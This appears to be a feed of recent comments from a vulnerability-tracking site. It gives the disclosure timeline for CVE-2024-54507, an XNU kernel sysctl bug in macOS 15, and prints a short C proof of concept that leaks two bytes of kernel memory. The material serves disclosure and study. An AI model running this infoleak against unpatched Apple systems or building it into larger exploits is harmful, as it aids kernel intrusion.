https://cve.circl.lu/comments/feedMost recent comment.2025-05-07T17:01:16.554287+00:00Vulnerability-Lookupinfo@circl.lupython-feedgenContains only the most 10 recent comments.https://cve.circl.lu/comment/fa8ceb01-4bdc-4f10-8a64-5a1b671dc259A particularly 'sus' sysctl in the XNU Kernel2025-05-07T17:01:16.569906+00:00Cédric Bonhommehttp://cve.circl.lu/user/cedric### Timeline
* September 16, 2024: macOS 15.0 Sequoia was released with xnu-11215.1.10, the first public kernel release with this bug.
* Fall 2024: I reported this bug to Apple.
* December 11, 2024: macOS 15.2 and iOS 18.2 were released, fixing this bug, and assigning CVE-2024-54507 to this issue.
2025-01-24T06:18:07.537395+00:00https://cve.circl.lu/comment/25c99b1c-5ba6-4c88-bac6-3ad6c5e525b4Proof Of Concept2025-05-07T17:01:16.561892+00:00Cédric Bonhommehttp://cve.circl.lu/user/cedric```c
// ravi (@0xjprx)
// 2-byte kernel infoleak, introduced in xnu-11215.1.10.
// gcc SUSCTL.c -o susctl
// ./susctl
#include <stdio.h>
#include <sys/sysctl.h>
void leak() {
uint64_t val = 0;
size_t len = sizeof(val);
sysctlbyname("net.inet.udp.log.remote_port_excluded", &val, &len, NULL, 0);
printf("leaked: 0x%llX 0x%llX\n", (val >> 16) & 0x0FF, (val >> 24) & 0x0FF);
}
int main() {
leak();
return 0;
}
```
from https://github.com/jprx/CVE-2024-545072025-01-24T06:32:36.489951+00:00